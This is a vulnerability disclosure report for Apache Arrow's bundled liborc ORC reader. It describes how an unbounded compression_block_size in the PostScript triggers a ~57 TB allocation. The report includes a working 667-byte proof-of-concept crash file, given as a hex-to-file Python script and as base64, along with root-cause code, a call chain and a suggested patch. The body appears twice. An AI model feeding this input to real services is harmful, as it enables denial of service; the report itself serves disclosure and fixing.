Summary
A 667-byte crafted ORC file makes arrow::adapters::orc::ORCFileReader::Open
attempt a ~57 TB heap allocation while decoding the file footer, because the
bundled liborc reader trusts the attacker-supplied PostScript
compression_block_size with no upper bound. Any application that opens an
untrusted ORC file through Arrow's public ORC reader can be driven into an
out-of-memory abort / denial of service by a tiny input.
The defective code is in the bundled Apache ORC C++ library (liborc),
reachable through Arrow's public API. The fix belongs in apache/orc; this report
should be filed against apache/orc as well as apache/arrow (which bundles it).
Tested at apache/arrow pinned commit 16fe34250a2ef261790b9cc414fdf0831669cf9f
(25.0.0-SNAPSHOT; ARROW_DEPENDENCY_SOURCE=BUNDLED -> orc-format 1.1.1).
Root Cause
The ORC PostScript carries a compression_block_size (uint64). When liborc
decodes the footer it reads this field verbatim and feeds it straight into a
decompression-buffer allocation that happens before any compressed data is
read, so the entire attacker-declared block size is allocated up front:
getCompressionBlockSize() returns ps.compression_block_size() with no
bound check (only a 256 KiB default when the field is absent) — c++/src/Reader.cc:59.
readFooter() passes that value as the blockSize argument to
createDecompressor() — c++/src/Reader.cc:1357.
- For
compression = ZLIB, createDecompressor() builds a
ZlibDecompressionStream (c++/src/Compression.cc:1293); its base
DecompressionStream constructor eagerly constructs
outputDataBuffer(pool, bufferSize) — c++/src/Compression.cc:463.
DataBuffer<char>::reserve() then calls memoryPool_.malloc(sizeof(char) * newCapacity)
— c++/src/MemoryPool.cc:106 — with newCapacity equal to the declared block
size, before a single byte of footer is decompressed.
Vulnerable code (c++/src/Reader.cc:59):
uint64_t getCompressionBlockSize(const proto::PostScript& ps) {
if (ps.has_compression_block_size()) {
return ps.compression_block_size(); // attacker-controlled, unbounded
} else {
return 256 * 1024;
}
}
Eager allocation (c++/src/Compression.cc:463 -> c++/src/MemoryPool.cc:106):
// Compression.cc — DecompressionStream ctor allocates the full block up front
DecompressionStream::DecompressionStream(std::unique_ptr<SeekableInputStream> inStream,
size_t bufferSize, MemoryPool& pool,
ReaderMetrics* metrics)
: pool(pool),
input(std::move(inStream)),
outputDataBuffer(pool, bufferSize), // bufferSize == compression_block_size
...
// MemoryPool.cc — reserve() mallocs the whole capacity before any data is read
template <class T>
void DataBuffer<T>::reserve(uint64_t newCapacity) {
if (newCapacity > currentCapacity_ || !buf_) {
...
buf_ = reinterpret_cast<T*>(memoryPool_.malloc(sizeof(T) * newCapacity));
currentCapacity_ = newCapacity;
}
}
Call chain (attacker bytes -> fault):
arrow::adapters::orc::ORCFileReader::Open adapter.cc:568 (public API)
-> ORCFileReader::Impl::Open adapter.cc:218
-> orc::createReader Reader.cc:1421
-> orc::readFooter Reader.cc:1357 getCompressionBlockSize(ps)
-> orc::createDecompressor Compression.cc:1293
-> orc::ZlibDecompressionStream::ctor Compression.cc:694
-> orc::DecompressionStream::ctor Compression.cc:463
-> orc::DataBuffer<char>::DataBuffer MemoryPool.cc:57
-> orc::DataBuffer<char>::reserve MemoryPool.cc:106 -> malloc(bufferSize)
liborc never validates the declared block size against the remaining
file / footer length before allocating.
PoC
A 667-byte crafted ORC file: a valid ORC magic plus a PostScript declaring
compression = ZLIB and an attacker-chosen compression_block_size
(0x33ffdbbd0000 ~ 57 TB after the buffer math).
# generate_poc.py — re-create the crash input from bytes
import binascii
POC_HEX = (
"4f52431100000a061204080550003b00000a1b0a0300000012140805120e080310feffffff0f"
"1882808080105000300000e392e2626660601012e66015e2e56012f8f71f0a180318002b0000"
"e352e76262601052e4609592e6648080064108fda15e12c6086000004700000a210a05000000"
"00001218080522120a00120bc3bc6ec3af63c3b664c3a9189c0150002700000a110a04000000"
"00120908052a030a010350002800002b63616060600262662066036286ffffffff0300200000"
"fbc7c2c4c400018c30bafe3f18fc0600360000636000811ff6608a81a141bef575e00e394e07"
"08f7433d549c01000f00004e040102000b402800004b4c4a3abc27eff0fae4c3db520eafaca0"
"100000050000ffa8a20000e362e360136090e0e602d18c120a609a49421a4c334bc883691609"
"3530cd2a2106a41981eac4c1349384309866969003d24c40755c603e0b549e55825588858341"
"800148322191c82240b614b3bb6f0800c40000e3aae462e1600d60e01ae16015e2e36016f8f7"
"ffff7f7e89a686860601a0a83050949783092c0a068c4041450e5629694e0608681084d01fea"
"25610ca012090e5625212e0621eec37bf20eaf4f3ebc2de5f04a893920cd9c1cac5acc5c8ccc"
"010c00680100e3601678cc24c5cdc12cb09051224f212b835549858347889591899985558a39"
"d3d8084898994831a70109c66229c62405060d060306250e0e66388b05ce6283b3d8e12c0608"
"cb80d58a85833580c14a848355880f68e1bffffffff34b343534340800458581a2bc1c4c6051"
"3060040a2a72b04a4973324040832084fe502f096300954870b02a09713008711fde9377787d"
"f2e16d2987574acc0169e6e460d562e662640e607098e0e7c198c46aa467a067080008b70110"
"01188080f4ddfdff0c2865300682f403034f524318"
)
data = binascii.unhexlify(POC_HEX)
assert len(data) == 667, len(data)
open("poc.bin", "wb").write(data)
Crash input size: 667 bytes (poc/poc.bin, md5 ec35f54cd76777e4f34f68f79c714a4e).
The PostScript declares compression_block_size such that the decompression
buffer math requests 0x33ffdbbd0000 (~57 TB).
Reproduction
Build Arrow C++ from source with -DARROW_ORC=ON and AddressSanitizer, then open the attached ORC file
through the public reader API:
#include <arrow/adapters/orc/adapter.h>
// auto in = ...read poc.bin into a RandomAccessFile...;
auto reader = arrow::adapters::orc::ORCFileReader::Open(in, arrow::default_memory_pool()); // huge alloc here
liborc's getCompressionBlockSize() returns the attacker-controlled PostScript compression_block_size
with no upper bound, fed to DataBuffer<char>::reserve() -> malloc:
AddressSanitizer: requested allocation size 0x33ffdbbd0000 (~57 TB) exceeds maximum supported size
DataBuffer<char>::reserve / readFooter (liborc Reader.cc)
ORCFileReader::Open (cpp/src/arrow/adapters/orc/adapter.cc)
From a 667-byte ORC file. The fix belongs in Apache ORC (liborc getCompressionBlockSize), reached via
the Arrow ORC reader. PoC: 667 bytes (recreate from the base64 below).
Suggested Fix
The fix belongs in Apache ORC (liborc), since the unbounded allocation lives
there. Validate the declared compression_block_size against a sane upper bound
and/or against the remaining footer/file length before constructing the
decompression buffer, rejecting the file with a parse error otherwise. The check
belongs in getCompressionBlockSize() (Reader.cc:59) or at the
createDecompressor call site in readFooter() (Reader.cc:1357), so no caller
can hand an unbounded bufferSize to DecompressionStream:
uint64_t getCompressionBlockSize(const proto::PostScript& ps) {
if (ps.has_compression_block_size()) {
- return ps.compression_block_size();
+ uint64_t blockSize = ps.compression_block_size();
+ // A compression block can never legitimately exceed the input; cap it so a
+ // malicious PostScript cannot force an unbounded up-front allocation.
+ if (blockSize > kMaxCompressionBlockSize) {
+ throw ParseError("Invalid compression block size in PostScript");
+ }
+ return blockSize;
} else {
return 256 * 1024;
}
}
(The exact bound is upstream's judgement.) Apache Arrow should pick up the fix
when it bumps the bundled liborc; until then Arrow may also consider bounding the
allocation at the adapter layer.
PoC bytes (self-contained)
The trigger input is 667 bytes (poc/poc.bin).
Recreate it exactly with:
base64 -d > poc.bin <<'B64'
T1JDEQAACgYSBAgFUAA7AAAKGwoDAAAAEhQIBRIOCAMQ/v///w8YgoCAgBBQADAAAOOS4mJmYGAQEuZgFeLlYBL49x8KGAMYACsA
AONS52JiYBBS5GCVkuZkgIAGQQj9oV4SxghgAABHAAAKIQoFAAAAAAASGAgFIhIKABILw7xuw69jw7Zkw6kYnAFQACcAAAoRCgQA
AAAAEgkIBSoDCgEDUAAoAAArY2FgYGACYmYgZgNihv////8DACAAAPvHwsTEAAGMMLr+Pxj8BgA2AABjYACBH/ZgioGhQb71deAO
OU4HCPdDPVScAQAPAABOBAECAAtAKAAAS0xKOrwn7/D65MPbUg6vrKAQAAAFAAD/qKIAAONi42ATYJDg5gLRjBIKYJpJQhpMM0vI
g2kWCTUwzSohBqQZgerEwTSThDCYZpaQA9JMQHVcYD4LVJ5VglWIhYNBgAFIMiGRyCJAthSzu28IAMQAAOOq5GLhYA1g4BrhYBXi
42AW+Pf//39+iaaGhgYBoKgwUJSXgwksCgaMQEFFDlYpaU4GCGgQhNAf6iVhDKASCQ5WJSEuBiHuw3vyDq9PPrwt5fBKiTkgzZwc
rFrMXIzMAQwAaAEA42AWeMwkxc3BLLCQUSJPISuDVUmFg0eIlZGJmYVVijnT2AhImJlIMacBCcZiKcYkBQYNBgMGJQ4OZjiLBc5i
g7PY4SwGCMuA1YqFgzWAwUqEg1WID2jhv/////NLNDU0NAgARYWBorwcTGBRMGAECipysEpJczJAQIMghP5QLwljAJVIcLAqCXEw
CHEf3pN3eH3y4W0ph1dKzAFp5uRg1WLmYmQOYHCY4OfBmMRqpGegZwgACLcBEAEYgID03f3/DChlMAaC9AMDT1JDGA==
B64
Credit
Aisle Research (Ze Sheng (O2Lab & TAMU), Dmitrijs Trizna, Luigino Camastra, Guido Vranken).
Summary
A 667-byte crafted ORC file makes
arrow::adapters::orc::ORCFileReader::Openattempt a ~57 TB heap allocation while decoding the file footer, because the
bundled liborc reader trusts the attacker-supplied PostScript
compression_block_sizewith no upper bound. Any application that opens anuntrusted ORC file through Arrow's public ORC reader can be driven into an
out-of-memory abort / denial of service by a tiny input.
The defective code is in the bundled Apache ORC C++ library (liborc),
reachable through Arrow's public API. The fix belongs in apache/orc; this report
should be filed against apache/orc as well as apache/arrow (which bundles it).
Tested at apache/arrow pinned commit
16fe34250a2ef261790b9cc414fdf0831669cf9f(25.0.0-SNAPSHOT;
ARROW_DEPENDENCY_SOURCE=BUNDLED-> orc-format 1.1.1).Root Cause
The ORC PostScript carries a
compression_block_size(uint64). When liborcdecodes the footer it reads this field verbatim and feeds it straight into a
decompression-buffer allocation that happens before any compressed data is
read, so the entire attacker-declared block size is allocated up front:
getCompressionBlockSize()returnsps.compression_block_size()with nobound check (only a 256 KiB default when the field is absent) —
c++/src/Reader.cc:59.readFooter()passes that value as theblockSizeargument tocreateDecompressor()—c++/src/Reader.cc:1357.compression = ZLIB,createDecompressor()builds aZlibDecompressionStream(c++/src/Compression.cc:1293); its baseDecompressionStreamconstructor eagerly constructsoutputDataBuffer(pool, bufferSize)—c++/src/Compression.cc:463.DataBuffer<char>::reserve()then callsmemoryPool_.malloc(sizeof(char) * newCapacity)—
c++/src/MemoryPool.cc:106— withnewCapacityequal to the declared blocksize, before a single byte of footer is decompressed.
Vulnerable code (
c++/src/Reader.cc:59):Eager allocation (
c++/src/Compression.cc:463->c++/src/MemoryPool.cc:106):Call chain (attacker bytes -> fault):
liborc never validates the declared block size against the remaining
file / footer length before allocating.
PoC
A 667-byte crafted ORC file: a valid
ORCmagic plus a PostScript declaringcompression = ZLIBand an attacker-chosencompression_block_size(
0x33ffdbbd0000~ 57 TB after the buffer math).Crash input size: 667 bytes (
poc/poc.bin, md5ec35f54cd76777e4f34f68f79c714a4e).The PostScript declares
compression_block_sizesuch that the decompressionbuffer math requests
0x33ffdbbd0000(~57 TB).Reproduction
Build Arrow C++ from source with
-DARROW_ORC=ONand AddressSanitizer, then open the attached ORC filethrough the public reader API:
liborc's
getCompressionBlockSize()returns the attacker-controlled PostScriptcompression_block_sizewith no upper bound, fed to
DataBuffer<char>::reserve()->malloc:From a 667-byte ORC file. The fix belongs in Apache ORC (liborc
getCompressionBlockSize), reached viathe Arrow ORC reader. PoC: 667 bytes (recreate from the base64 below).
Suggested Fix
The fix belongs in Apache ORC (liborc), since the unbounded allocation lives
there. Validate the declared
compression_block_sizeagainst a sane upper boundand/or against the remaining footer/file length before constructing the
decompression buffer, rejecting the file with a parse error otherwise. The check
belongs in
getCompressionBlockSize()(Reader.cc:59) or at thecreateDecompressorcall site inreadFooter()(Reader.cc:1357), so no callercan hand an unbounded
bufferSizetoDecompressionStream:uint64_t getCompressionBlockSize(const proto::PostScript& ps) { if (ps.has_compression_block_size()) { - return ps.compression_block_size(); + uint64_t blockSize = ps.compression_block_size(); + // A compression block can never legitimately exceed the input; cap it so a + // malicious PostScript cannot force an unbounded up-front allocation. + if (blockSize > kMaxCompressionBlockSize) { + throw ParseError("Invalid compression block size in PostScript"); + } + return blockSize; } else { return 256 * 1024; } }(The exact bound is upstream's judgement.) Apache Arrow should pick up the fix
when it bumps the bundled liborc; until then Arrow may also consider bounding the
allocation at the adapter layer.
PoC bytes (self-contained)
The trigger input is 667 bytes (
poc/poc.bin).Recreate it exactly with:
Credit
Aisle Research (Ze Sheng (O2Lab & TAMU), Dmitrijs Trizna, Luigino Camastra, Guido Vranken).